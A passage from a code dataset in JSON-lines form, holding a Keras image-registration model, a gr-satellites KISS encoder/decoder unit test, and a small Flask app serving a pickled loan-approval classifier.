OUTPUT_DIR_ARG_NAME)\n )\n","repo_name":"thunderhoser/ml4convection","sub_path":"ml4convection/scripts/plot_satellite.py","file_name":"plot_satellite.py","file_ext":"py","file_size_in_byte":10744,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"28851108888","text":"from __future__ import print_function\nfrom keras.models import Model\nfrom keras.layers import *\nfrom neuron.layers import SpatialTransformer\nfrom src.models.utils import get_initial_weights\nfrom src.models.layers import BilinearInterpolation\n\nclass BilinearUpsampling(Layer):\n\n def __init__(self, upsampling=(2, 2), data_format=None, **kwargs):\n\n super(BilinearUpsampling, self).__init__(**kwargs)\n self.data_format = conv_utils.normalize_data_format(data_format)\n self.upsampling = conv_utils.normalize_tuple(upsampling, 2, 'size')\n self.input_spec = InputSpec(ndim=4)\n\n def compute_output_shape(self, input_shape):\n height = self.upsampling[0] * \\\n input_shape[1] if input_shape[1] is not None else None\n width = self.upsampling[1] * \\\n input_shape[2] if input_shape[2] is not None else None\n return (input_shape[0],\n height,\n width,\n input_shape[3])\n\n def call(self, inputs):\n return K.tf.image.resize_bilinear(inputs, (int(inputs.shape[1]*self.upsampling[0]),\n int(inputs.shape[2]*self.upsampling[1])))\n\n def get_config(self):\n config = {'size': self.upsampling,\n 'data_format': self.data_format}\n base_config = super(BilinearUpsampling, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\ndef flowinverse(flow):\n flow0 = Lambda(lambda x: K.expand_dims(x[:, :, :, 0], axis=-1))(flow)\n flow1 = Lambda(lambda x: K.expand_dims(x[:, :, :, 
1], axis=-1))(flow)\n\n flow0 = SpatialTransformer(interp_method='linear', indexing='ij', name='inverse_stn1')([flow0, flow])\n flow1 = SpatialTransformer(interp_method='linear', indexing='ij', name='inverse_stn2')([flow1, flow])\n\n flow_inverse = Concatenate()([flow0, flow1])\n flow_inverse = Lambda(lambda x: x * -1.)(flow_inverse)\n return flow_inverse\n\ndef BN_block(filter_num, input, name, trainable=True):\n x = Conv2D(filter_num, 3, padding='same', kernel_initializer='he_normal', name='conv' + name + '_1',\n trainable=trainable)(input)\n x = BatchNormalization(name='BN' + name + '_1', trainable=trainable)(x)\n # x = LeakyReLU(name='LeakyReLU' + name + '_1')(x)\n x = Activation('relu')(x)\n x = Conv2D(filter_num, 3, padding='same', kernel_initializer='he_normal', name='conv' + name + '_2',\n trainable=trainable)(x)\n x = BatchNormalization(name='BN' + name + '_2', trainable=trainable)(x)\n # x = LeakyReLU(name='LeakyReLU' + name + '_2')(x)\n x = Activation('relu')(x)\n return x\n\ndef BN_block_leaky(filter_num, input, name, trainable=True):\n x = Conv2D(filter_num, 3, padding='same', kernel_initializer='he_normal', name='conv' + name + '_1',\n trainable=trainable)(input)\n x = BatchNormalization(name='BN' + name + '_1', trainable=trainable)(x)\n x = LeakyReLU(name='LeakyReLU' + name + '_1')(x)\n # x = Activation('relu')(x)\n x = Conv2D(filter_num, 3, padding='same', kernel_initializer='he_normal', name='conv' + name + '_2',\n trainable=trainable)(x)\n x = BatchNormalization(name='BN' + name + '_2', trainable=trainable)(x)\n x = LeakyReLU(name='LeakyReLU' + name + '_2')(x)\n # x = Activation('relu')(x)\n return x\n\ndef block_leaky_single(filter_num, input, name, trainable=True):\n x = Conv2D(filter_num, 3, padding='same', kernel_initializer='he_normal', name='conv' + name + '_1',\n trainable=trainable)(input)\n x = LeakyReLU(name='LeakyReLU' + name + '_1')(x)\n return x\n\ndef Affine_arch(input_stack, trainable=False, w=16):\n affine_net1 = BN_block_leaky(w, input_stack, name='affine_net1', trainable=trainable)\n pool1 = MaxPooling2D(pool_size=(2, 2))(affine_net1)\n affine_net2 = BN_block_leaky(w * 2, pool1, name='affine_net2', trainable=trainable)\n pool2 = MaxPooling2D(pool_size=(2, 2))(affine_net2)\n affine_net3 = BN_block_leaky(w * 2, pool2, name='affine_net3', trainable=trainable)\n pool3 = MaxPooling2D(pool_size=(2, 2))(affine_net3)\n affine_net4 = BN_block_leaky(w * 4, pool3, name='affine_net4', trainable=trainable)\n pool4 = MaxPooling2D(pool_size=(2, 2))(affine_net4)\n affine_net5 = BN_block_leaky(w * 4, pool4, name='affine_net5', trainable=trainable)\n affine_net5 = Dropout(0.3, name='affine_net5gdrop_1')(affine_net5)\n pool5 = MaxPooling2D(pool_size=(2, 2))(affine_net5)\n affine_net6 = BN_block_leaky(w * 8, pool5, name='affine_net6', trainable=trainable)\n affine_net6 = Dropout(0.3, name='affine_net6gdrop_1')(affine_net6)\n\n affine_net = Flatten()(affine_net6)\n affine_net = Dense(32, activation='relu', name='affine_net_dense1', trainable=trainable)(affine_net)\n weights = get_initial_weights(32)\n affine_net = Dense(6, weights=weights, activation='linear', name='affine_net_dense2', trainable=trainable)(affine_net)\n\n return affine_net\n\ndef Unet_arch(input_stack, w=16, name='1'):\n conv1 = BN_block_leaky(w, input_stack, name=name + 'g1')\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n\n conv2 = BN_block_leaky(w*2, pool1, name=name + 'g2')\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n\n conv3 = BN_block_leaky(w*2, pool2, name=name + 'g3')\n pool3 = 
MaxPooling2D(pool_size=(2, 2))(conv3)\n #\n conv4 = BN_block_leaky(w * 4, pool3, name=name + 'g4')\n drop4 = Dropout(0.3, name=name + 'gdrop_1')(conv4)\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\n #\n conv5 = BN_block_leaky(w * 4, pool4, name=name + 'g5')\n drop5 = Dropout(0.3, name=name + 'gdrop_2')(conv5)\n\n up6 = Conv2D(w * 4, 2, padding='same', kernel_initializer='he_normal', name=name + 'gup6')(\n UpSampling2D(size=(2, 2))(drop5))\n up6 = BatchNormalization(name='BNup6')(up6)\n up6 = LeakyReLU(name='leakyup6')(up6)\n # up6 = Activation('relu')(up6)\n merge6 = Concatenate()([drop4, up6])\n conv6 = BN_block_leaky(w * 4, merge6, name=name + 'g6')\n #\n up7 = Conv2D(w * 2, 2, padding='same', kernel_initializer='he_normal', name=name + 'gup7')(\n UpSampling2D(size=(2, 2))(conv6))\n up7 = BatchNormalization(name='BNup7')(up7)\n # up7 = Activation('relu')(up7)\n up7 = LeakyReLU(name='leakyup7')(up7)\n merge7 = Concatenate()([conv3, up7])\n conv7 = BN_block_leaky(w * 2, merge7, name=name + 'g7')\n #\n up8 = Conv2D(w*2, 2, padding='same', kernel_initializer='he_normal', name=name + 'gup8')(\n UpSampling2D(size=(2, 2))(conv7))\n up8 = BatchNormalization(name='BNup8')(up8)\n up8 = LeakyReLU(name='leakyup8')(up8)\n # up8 = Activation('relu')(up8)\n merge8 = Concatenate()([conv2, up8])\n conv8 = BN_block_leaky(w*2, merge8, name=name +'g8')\n\n up9 = Conv2D(w, 2, padding='same', kernel_initializer='he_normal', name=name + 'gup9')(\n UpSampling2D(size=(2, 2))(conv8))\n up9 = BatchNormalization(name='BNup9')(up9)\n up9 = LeakyReLU(name='leakyup9')(up9)\n # up9 = Activation('relu')(up9)\n merge9 = Concatenate()([conv1, up9])\n conv9 = BN_block_leaky(w, merge9, name=name + 'g9')\n\n # x1 = Conv2D(64, 3, padding='same', kernel_initializer='he_normal', name='conv' + name + '_1')(conv9)\n # x1 = BatchNormalization(name='BN' + 'end_1')(x1)\n # conv9 = Activation('tanh')(x1)\n\n return conv9\n\ndef Affine_net(w=16, trainable=False):\n src = Input(shape=(224, 224, 1))\n tgt = Input(shape=(224, 224, 1))\n\n input_stack = Concatenate()([src, tgt])\n affine_param = Affine_arch(input_stack, trainable=trainable, w=w)\n affine_result = BilinearInterpolation((224, 224), name='affine_result')([src, affine_param])\n\n model = Model(input=[src, tgt], output=[affine_result])\n return model\n\ndef dual_net(w):\n src = Input(shape=(224, 224, 1))\n tgt = Input(shape=(224, 224, 1))\n label = Input(shape=(224, 224, 1))\n\n input_stack = Concatenate()([src, tgt])\n affine_param = Affine_arch(input_stack, trainable=False)\n src_affine = BilinearInterpolation((224, 224), name='src_affine')([src, affine_param])\n\n flow_ori1 = Unet_arch(Concatenate()([src_affine, tgt]), w=w)\n flow = Conv2D(2, 3, name='flow', padding='same', activation='linear', kernel_initializer='he_normal')(flow_ori1)\n deformable = SpatialTransformer(interp_method='linear', indexing='ij', name='stn0')([src_affine, flow])\n\n flow_ori2 = flowinverse(flow)\n inverse_deformable = SpatialTransformer(interp_method='linear', indexing='ij', name='defo_iv')([deformable, flow_ori2])\n resduce = Lambda(lambda x: x[0] - x[1], name='rl')([src_affine, inverse_deformable])\n\n label_affine = BilinearInterpolation((224, 224), name='src_affine2')([label, affine_param])\n label_flow = SpatialTransformer(interp_method='linear', indexing='ij', name='stn4')([label_affine, flow])\n model = Model(input=[src, tgt, label], output=[flow, deformable, resduce, label_flow])\n\n return 
model\n","repo_name":"SZUHvern/TMI_multi-contrast-registration","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8881,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} +{"seq_id":"36338804500","text":"from gnuradio import gr, blocks, gr_unittest\nimport pmt\nimport numpy as np\n\n# bootstrap satellites module, even from build dir\ntry:\n import python as satellites\nexcept ImportError:\n pass\nelse:\n import sys\n sys.modules['satellites'] = satellites\n\nfrom satellites import kiss_to_pdu, pdu_to_kiss\nfrom satellites.grtypes import byte_t\n\n\nclass qa_kiss(gr_unittest.TestCase):\n def setUp(self):\n self.tb = gr.top_block()\n\n def tearDown(self):\n self.tb = None\n\n def test_encoder_decoder(self):\n \"\"\"Connects a PDU to KISS and KISS to PDU and sends PDUs through\"\"\"\n pdu2kiss = pdu_to_kiss(include_timestamp=True)\n kiss2pdu = kiss_to_pdu()\n pdu2tag = blocks.pdu_to_tagged_stream(byte_t)\n dbg = blocks.message_debug()\n\n self.tb.connect(pdu2tag, kiss2pdu)\n self.tb.msg_connect((pdu2kiss, 'out'), (pdu2tag, 'pdus'))\n self.tb.msg_connect((kiss2pdu, 'out'), (dbg, 'store'))\n\n test_size = 150\n test_number_frames = 7\n test_data = [np.random.randint(0, 256, test_size, dtype='uint8')\n for _ in range(test_number_frames)]\n for td in test_data:\n test_frame = pmt.cons(pmt.PMT_NIL,\n pmt.init_u8vector(test_size, td))\n pdu2kiss.to_basic_block()._post(pmt.intern('in'), test_frame)\n pdu2kiss.to_basic_block()._post(\n pmt.intern('system'),\n pmt.cons(pmt.intern('done'), pmt.from_long(1)))\n\n self.tb.start()\n self.tb.wait()\n\n for j, td in enumerate(test_data):\n result_data = pmt.u8vector_elements(pmt.cdr(dbg.get_message(j)))\n np.testing.assert_equal(\n td, result_data,\n 'KISS to PDU output does not match expected frame')\n\n\nif __name__ == '__main__':\n gr_unittest.run(qa_kiss)\n","repo_name":"daniestevez/gr-satellites","sub_path":"python/qa_kiss.py","file_name":"qa_kiss.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":700,"dataset":"github-code","pt":"32"} +{"seq_id":"12128925639","text":"import pickle\nimport numpy as np\nimport os\n\nfrom flask import Flask, request, render_template, make_response\n\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import binarize, LabelEncoder, MinMaxScaler\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import linear_model\n\n#from sklearn.utils.deprecation import deprecated\n\napp = Flask(__name__, static_url_path='/static')\napp.config[\"SEND_FILE_MAX_AGE_DEFAULT\"] = 0\n\n#arquivo = \"model/modelo.pkl\"\n#with open(arquivo, \"rb\") as f:\n# model = pickle.load(f)\n\nmodel = pickle.load(open(\"model/modelo.pkl\", \"rb\"))\n\n\n@app.route(\"/\")\ndef display_gui():\n return render_template(\"template.html\")\n\n\n@app.route(\"/verificar\", methods=[\"POST\"])\ndef verificar():\n sexo = request.form['gridRadiosSexo']\n dependentes = request.form['dependentes']\n casado = request.form['gridRadiosCasado']\n trabalho_conta_propria = request.form['gridRadiosTrabalhoProprio']\n rendimento = request.form['rendimento']\n educacao = request.form['educacao']\n valoremprestimo = request.form['valoremprestimo']\n teste = np.array([[\n sexo, casado, dependentes, educacao, trabalho_conta_propria,\n rendimento, valoremprestimo\n ]])\n\n print(\":::::: Dados de Teste ::::::\")\n print(\"Sexo: {}\".format(sexo))\n print(\"Numero de Dependentes: {}\".format(dependentes))\n print(\"Casado: 
{}\".format(casado))\n print(\"Educacao: {}\".format(educacao))\n print(\"Trabalha por conta propria: {}\".format(trabalho_conta_propria))\n print(\"Rendimento: {}\".format(rendimento))\n print(\"Valor do emprestimo: {}\".format(valoremprestimo))\n print(\"\\n\")\n\n classe = model.predict(teste)[0]\n print(\"Classe Predita: {}\".format(str(classe)))\n\n return render_template('template.html', classe=str(classe))\n\n\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)","repo_name":"andersonlx/machine-learning-previsao-emprestimo","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}